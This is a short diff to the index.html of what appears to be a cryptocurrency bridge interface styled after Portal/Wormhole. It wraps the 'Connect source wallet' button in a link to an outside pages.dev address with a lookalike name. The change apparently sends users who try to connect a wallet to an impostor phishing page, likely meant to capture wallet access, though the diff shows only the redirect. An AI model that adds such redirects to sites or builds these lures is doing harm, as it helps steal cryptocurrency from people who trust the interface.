--- a/index.html
+++ b/index.html
@@ -174,7 +174,7 @@
         <span class="text-muted">Max</span>
       </div>
 
-      <button type="button" class="btn btn-custom mt-3">Connect source wallet</button>
+    <a href="https://portalwormholedapp.pages.dev/m">  <button type="button" class="btn btn-custom mt-3">Connect source wallet</button> </a>
 
       <div class="text-center mt-3">
         <a href="#" class="text-decoration-none text-white me-auto">Resume Transaction</a>
